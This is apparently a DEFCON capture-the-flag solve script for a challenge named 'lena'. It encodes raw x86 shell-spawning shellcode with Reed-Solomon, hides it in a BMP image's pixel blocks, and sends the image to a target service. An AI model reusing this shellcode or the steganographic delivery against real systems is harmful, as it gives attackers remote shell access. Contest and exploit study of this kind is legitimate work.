DEFCON Writeup lena
from PIL import Image
from socket import *
from random import randint
from reedsolo import RSCodec
from struct import pack
# Raw payload bytes of the writeup, kept exactly as given. Under Python 2 this is a
# byte string, so list() yields one single-character str per byte.
shellcode = list("jfX\x99j\x01[RSj\x02\x89\xe1\xeb\x01\x90\xcd\x80[]\xbe\x80\xff\xff\xfe\xf7\xd6V\x90\xeb\x01\x90f\xbdiz\x0f\xcd\t\xddUCj\x10Q\xeb\x01\x90P\xb0f\x89\xe1\xcd\x80\x87\xd9[\xb0?\x90\xeb\x01\x90\xcd\x80Iy\xf5\xb0\x0bR\x90\x90\x90\x90\x90\xeb\x01\x90h//shh/bin\x89\xe3R\xeb\x01\x90S\xeb\xd0")
# Reed-Solomon codec with 17 parity symbols per codeword (third-party `reedsolo`).
rs = RSCodec(17)
encoded_shellcode = ""
# NOTE(review): the loop steps 16 bytes but each slice is only 15 wide, so every 16th
# byte of `shellcode` (indices 15, 31, ...) is never passed to the encoder. The
# recurring "\xeb\x01\x90" triplets in the payload look placed around those
# boundaries, so this may be deliberate — confirm before changing either side.
for i in range(0, len(shellcode), 16):
    encoded_shellcode += rs.encode(shellcode[i:i+15])
# Header codeword prepended to the encoded body: "MARK" magic, the little-endian
# length of the encoded body, five 0x90 bytes and the two-byte 0xEB 0x01.
encoded_shellcode = rs.encode(list("MARK" + pack("<I", len(encoded_shellcode)) + "\x90" * 5 + "\xEB\x01")) + encoded_shellcode
# NOTE(review): presumably rs.encode() hands back a bytearray; str() on a bytearray is
# the raw bytes on Python 2 but the "bytearray(b'...')" repr on Python 3, so this line
# is not portable — verify when running under a different interpreter.
encoded_shellcode = str(encoded_shellcode)
# 8x8 table of channel values written into a pixel block by increase_entropy_RGB
# (one entry per pixel of the block, row-major).
high_entropy = [[30, 28, 174, 118, 106, 199, 58, 101], [229, 76, 74, 135, 244, 246, 236, 186], [110, 68, 37, 185, 14, 193, 240, 123], [87, 94, 201, 202, 63, 126, 61, 60], [123, 125, 104, 157, 173, 218, 45, 203], [147, 203, 191, 59, 149, 206, 179, 187], [176, 184, 248, 45, 82, 41, 176, 209], [20, 28, 31, 195, 133, 167, 35, 242]]
# Canvas size in pixels; make_payload walks it in 8-pixel steps.
width = 512
height = 512
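def increase_entropy_RGB(pix, x, y, RGB, pattern=None):
    """Overwrite selected colour channels of one 8x8 pixel block with a fixed table.

    The block's top-left corner is (x, y). Pixel (x+j, y+i) receives pattern[i][j]
    in every channel selected by ``RGB`` (0b100 = R, 0b010 = G, 0b001 = B); channels
    that are not selected keep their current value. Every pixel of the block is
    written back, selected or not, exactly as before.

    Args:
        pix: indexable pixel store, read and written as ``pix[x, y] -> (R, G, B)``
            (a PIL pixel-access object or any mapping keyed by (x, y) tuples).
        x, y: top-left corner of the 8x8 block.
        RGB: 3-bit channel mask.
        pattern: 8x8 table of channel values. Defaults to the module-level
            ``high_entropy`` table, so existing callers are unaffected; passing it
            explicitly lets the function be used (and tested) without that global.

    Returns:
        Number of channels written to (0-3): the channel-write count divided by
        the 64 pixels of a block. Floor division keeps the Python 2 integer result
        on Python 3 as well (the count is always a multiple of 64).
    """
    if pattern is None:
        pattern = high_entropy
    times = 0
    for i in range(8):
        row = pattern[i]
        for j in range(8):
            R, G, B = pix[x + j, y + i]
            value = row[j]
            if RGB & 0b100:
                R = value
                times += 1
            if RGB & 0b010:
                G = value
                times += 1
            if RGB & 0b001:
                B = value
                times += 1
            pix[x + j, y + i] = (R, G, B)
    return times // 64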
def make_bits(string):
    """Expand *string* into a flat list of bits, most significant bit first.

    Each character contributes its ordinal in binary, left-padded to eight digits;
    an ordinal above 255 simply contributes more than eight bits, matching the
    original padding arithmetic.
    """
    return [int(digit) for ch in string for digit in format(ord(ch), "08b")]
def add_bit(pix, x, y, RGB, bit):
    """Embed one bit into the 8x8 block at (x, y) by perturbing a single channel.

    ``RGB`` picks the channel (0 = R, 1 = G, 2 = B). A 0 bit leaves the block
    untouched and returns None; a 1 bit hands the block to increase_entropy_RGB
    with the matching channel mask and returns its result.
    """
    if bit == 0:
        return None
    channel_mask = {0: 0b100, 1: 0b010, 2: 0b001}
    return increase_entropy_RGB(pix, x, y, channel_mask[RGB])
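def make_payload(pix, width, height, string):
    """Embed *string* bit by bit into *pix*, one bit per colour channel per 8x8 block.

    Blocks are visited row-major in 8-pixel steps; within a block the channels are
    used in the order R, G, B (three bits per block). The channel index cycles via
    ``RGB`` across the whole walk, so a block that exhausts the sequence early leaves
    the cycle where it stopped. Each bit goes through add_bit (a 1 bit overwrites
    the channel with the entropy table, a 0 bit leaves it alone).

    Args:
        pix: indexable pixel store as consumed by add_bit / increase_entropy_RGB.
        width, height: canvas size in pixels.
        string: payload whose bits (from make_bits) are embedded.

    Returns:
        Number of bits actually embedded. The original function discarded this
        count, so a payload larger than the canvas capacity (3 bits per 8x8 block)
        was truncated without any signal; callers can now compare the result with
        ``len(make_bits(string))`` to detect that.
    """
    RGB = 0
    bit_sequence = make_bits(string)
    total = len(bit_sequence)
    count = 0  # bits written so far; doubles as the read position in bit_sequence
    for i in range(0, height, 8):
        if count >= total:
            break
        for j in range(0, width, 8):
            if count >= total:
                break
            for _ in range(3):
                if count >= total:
                    break
                add_bit(pix, j, i, RGB, bit_sequence[count])
                RGB = (RGB + 1) % 3
                count += 1
    return count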
# Build a white width x height RGB canvas and embed the encoded payload into it.
img = Image.new('RGB', (width, height), (255, 255, 255))
pix = img.load()
# NOTE(review): make_payload() returns nothing, so a payload larger than the canvas
# capacity (3 bits per 8x8 block) would be truncated silently.
make_payload(pix, width, height, encoded_shellcode)
img.save("solve.bmp")
# NOTE(review): the BMP is read back in text mode and the handle is never closed;
# "rb" inside a with-statement is the portable form (text mode mangles binary data on
# platforms that translate line endings).
shellcode_pic = open("solve.bmp").read()
# Python 2 socket client; AF_INET / SOCK_STREAM come from `from socket import *`.
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(("192.168.174.202", 12345))
# NOTE(review): send() may transmit only part of the buffer for a payload this size;
# sendall() retries until everything is written. The socket is never closed.
sock.send(shellcode_pic)
# Python 2 print statement; a single recv() may return less than the full reply.
print sock.recv(1024)